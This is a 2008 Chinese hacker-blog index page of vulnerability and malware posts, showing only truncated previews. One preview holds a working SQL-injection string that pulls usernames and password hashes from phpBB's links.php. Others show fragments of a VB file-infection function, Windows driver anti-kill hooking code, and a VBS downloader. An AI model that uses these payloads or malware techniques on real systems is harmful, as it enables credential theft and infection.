
‖漏 洞 公 布‖
文章平均质量分 64
hackiis
这个作者很懒,什么都没留下…
展开
-
Google的博客blogspot.com窃取cookie漏洞
Google的博客blogspot.com站点. 支持html,然后可以在其中插入类似如下内容.获取cookie原创 2008-09-11 16:12:00 · 588 阅读 · 0 评论 -
外国的注入技巧收集
The attack is targeting Microsoft IIS web servers. Is it exploiting a Microsoft vulnerability? Yes and no. Web developers (or their employers who did not mandate proper security education) are to bla原创 2008-09-15 07:59:00 · 549 阅读 · 0 评论 -
phpinfo跨站脚本漏洞
洞成因: phpinfo页面对输入的参数都做了详细的过滤,但是没有对输出的进行charset的指定,而在一些浏览器里如IE7里,你可以让它自动选择编码或者通过一个iframe页面给它指定编码,这样就可以饶过phpinfo的过滤而产生一个跨站脚本漏洞。 漏洞来源: http://www.80sec.com/release/phpinfo-xss.txt 漏洞利用: 利用代码如下: 以上原创 2008-09-11 16:28:00 · 1254 阅读 · 0 评论 -
一段提取用户名和md5的代码编程
搞了个phpbb的站,用的是很老的links.php漏洞了。注入代码如下: links.php?t=search&search_keywords=asd&start=1,1 UNION SELECT 1,username,user_password,4,5,6,7,8,9,10,11,12,13 FROM phpbb_users where user_id limit 0,1000/*原创 2008-09-15 08:03:00 · 533 阅读 · 0 评论 -
新的VBS下载者代码
新的VBS下载者代码 2008-09-10 13:12 来源:黑白网络 浏览:56[字号: 大 中 小 ][打印稿件][关闭窗口]使用方法: 1.exe2hex.vbs 把exe转成十六进制,放到网络上 2原创 2008-09-15 08:03:00 · 696 阅读 · 0 评论 -
Foxit Reader处理包含有畸形/XObject资源的网页时存在漏洞,用户在处理恶意文件时会导致Foxit Reader崩溃
Foxit Reader处理包含有畸形/XObject资源的网页时存在漏洞,用户在处理恶意文件时会导致Foxit Reader崩溃 受影响系统:Foxit Foxit Reader 2.2描述:--------------------------------------------------------------------------------BUGTRAQ ID: 288原创 2008-09-11 16:46:00 · 1217 阅读 · 0 评论 -
迅雷ActiveX控件远程代码执行漏洞
Affected Software Versions: 迅雷5(Version of "DapCtrl*.dll" Details: 漏洞存在于由ActiveX控件"DapCtrl*.dll"导出的"Put()"函数中,相关信息如下: InprocServer32: C:/Documents and Settings/All Users/Applicat原创 2008-09-11 16:26:00 · 545 阅读 · 0 评论 -
FoosunCMS Sql Injection Vulnerability
#漏洞原因: 变量username未经过滤传值,带入sql执行,导致注入产生。 #关键代码: If CheckPost() Then Select Case Act Case "checkname" 触发注入 Checkname() CheckPost()函数原型在行73-96,username由此获取值,代码如下: XmlDoc.documentElement.selectSingleNode(转载 2008-09-11 16:23:00 · 550 阅读 · 0 评论 -
VB感染函数代码
Private Function InfectedFiles(ByVal FilePath As String) As Boolean Dim MyArray() As Byte Dim FileArray() As Byte If FileLen(FilePath) > 4194304 Then Exit Function ’大于4mb不感染 Open MyName For Binary Ac原创 2008-09-15 08:05:00 · 686 阅读 · 0 评论 -
文件捆绑感染方式编程
近在研究病毒木马程序的感染和捆绑方式。 发现文件困绑有多种方式 我只和大家探讨两种方式 一种是附加的方式,一种是内嵌式 第一种方式 就是将木马程序附加在别的程序头部 也就是说 运行的目标程序是木马 然后木马程序将原程序解压出来再运行 听说熊猫烧香的程序用的就是这种方法 这种方式有缺点也有优点 优点是: 可以捆绑任何程序 缺点是: 运行时需要把目标程序给拷贝出来然后 然后再运行真正的程序原创 2008-09-15 08:04:00 · 908 阅读 · 1 评论 -
驱动防杀防删代码编程
#include #include typedef struct _SRVTABLE { PVOID *ServiceTable; ULONG LowCall; ULONG HiCall; PVOID *ArgTable; } SRVTABLE, *PSRVTABLE; extern PSRVTABLE KeServiceDescriptorTable; //调用原函数 #原创 2008-09-15 08:02:00 · 711 阅读 · 0 评论 -
Ghost有漏洞 镜像恢复需小心陷阱
万能Ghost系统制作时,是在安装成功后删除Windows自带的多余文件,并且删除硬件信息,然后进行系统封装。如果在安装前,制作者有意将某个系统文件替换成木马后门,或者在系统中打开某些端口,开启某些危险服务,留下某些空口令帐户,那么制作出来的Ghost系统就会存在各种安全漏洞。这些Ghost系统流传出去后使用这些系统的用户可能被作者控制为肉鸡。 二、Ghost版系统常见漏洞一览原创 2008-09-11 16:28:00 · 863 阅读 · 2 评论 -
php escapeshellcmd多字节编码漏洞解析及延伸
/* {{{ php_escape_shell_cmd Escape all chars that could possibly be used to break out of a shell command This function emalloc’s a string and returns the pointer. Remember to efree it whe原创 2008-09-11 16:24:00 · 717 阅读 · 0 评论 -
解析暴库漏洞原理及规律
SQL注入流行很久了,我们找漏洞注入目的无非是想得到数据库内的东西,比如用户名密码等,更进一步的MSSQL数据库还可以借此获得权限。基于Access的基础来说,如果我们不用注入就可以得到整个数据库,不是更好吗?于是暴库成了一个比注入更简单的入侵手段。 有关暴库的方法,高手们常在入侵文章中提到,但多是一笔带过,有些就某一个方法谈的,也多是就方法进行探讨。最近有一篇《再谈%5c暴库的利用》的文章,算是原创 2008-09-15 07:56:00 · 759 阅读 · 0 评论